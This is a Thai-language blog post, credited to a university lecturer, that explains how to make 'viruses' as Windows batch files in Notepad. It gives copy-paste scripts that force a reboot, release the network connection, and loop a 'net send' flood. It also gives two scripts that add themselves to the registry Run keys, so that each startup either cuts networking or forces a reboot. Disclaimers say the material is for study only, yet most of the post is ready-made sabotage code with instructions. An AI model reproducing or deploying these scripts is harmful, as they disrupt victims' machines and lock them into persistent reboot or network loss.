วันอาทิตย์ที่ 9 มิถุนายน พ.ศ. 2556

วิธีเขียนโค้ดใน Notepad สร้างไวรัส ง่ายๆ แต่อันตราย

เอาไว้ศึกษาเป็นความรู้นะครับ อย่าเอาไว้ไปแกล้งใครนะครับ ส่วน Source Code ทุกๆ ชนิด ใช้วิธีทำแบบเดียวกันทั้งหมด คือ สร้าง Code ในโปรแกรม Notepad แล้วบันทึกในชื่อตามที่ต้องการ แต่นามสกุลต้องเป็น bat


ไวรัส #1 กดแล้ว ปิดเครื่อง

ตัวนี้ไม่มีอะไรมาก แค่ดับเบิลคลิกชื่อไฟล์ที่เราสร้าง เครื่องคอมพิวเตอร์ ก็จะชัตดาวน์ทันที ไม่ทำลายข้อมูลใดๆ ทั้งสิ้น

Code:

@echo off
TITLE Mr_Unlocker
shutdown -r -f -t0


วิธีทำ

1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.บันทึกไฟล์ชื่ออะไรก็ ได้แต่ให้มีนามสกุลเป็น .bat

***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***ไวรัส # 2 ตัดการเชื่อมต่ออินเตอร์เน็ต/เน็ตเวิร์ก
อันนี้แรงขึ้นมาหน่อย จะตัดการทำงานของอินเตอร์เน็ต

Code:

@echo off
TITLE Mr_Unlocker
ipconfig /releaseไวรัส # Combo Virus
ตัวนี้จะมีความต่อเนื่องจากสองตัวข้างบน คือ เมื่อคลิกแล้ว จะทำ flood network และการทำงานจะวน loop จนเน็ตเวิร์กเดี้ยง

Code:

@echo off
TITLE Mr_Unlocker :CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ต่อไปนี้จะเป็นไวรัสที่สร้างความรุนแรงจริงๆนะครับ อย่าเผลอลองเชียว

ไวรัส # Disble IP Address
โดนตัวนี้เข้าไปก็อย่าหวังเลยว่าจะเข้าอินเตอร์เน็ตได้อีก - -'

Code:

@echo off
break off
TITLE Unlocker Hackers
echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo Unlocker Hackers Strike Again
PAUSEไวรัส # สั่งปิดเครื่องทุกๆ ครั้งที่เปิดจนถึง 11 วินาที (เปิดแล้วก็ปิดอยู่อย่างนั้น)

Code:


@echo off
break off
TITLE Unlocker Hackers
echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
echo Unlocker Hackers Strike Again
PAUSE
บทความนี้ หวังเป็นอย่างยิ่งว่าใช้เพื่อการศึกษาเท่านั้น มิได้เจตนาสร้างความเดือดร้อนแก่ใคร ผู้ศึกษาควรใช้ความคิด และมีจริยธรรมในการศึกษาเรียบเรียงโดย อ.ปริญญา น้อยดอนไพร สาขาวิชาวิทยาการคอมพิวเตอร์ คณะวิทยาศาสตร์และเทคโนโลยี มหาวิทยาลัยราชภัฏสุราษฎร์ธานี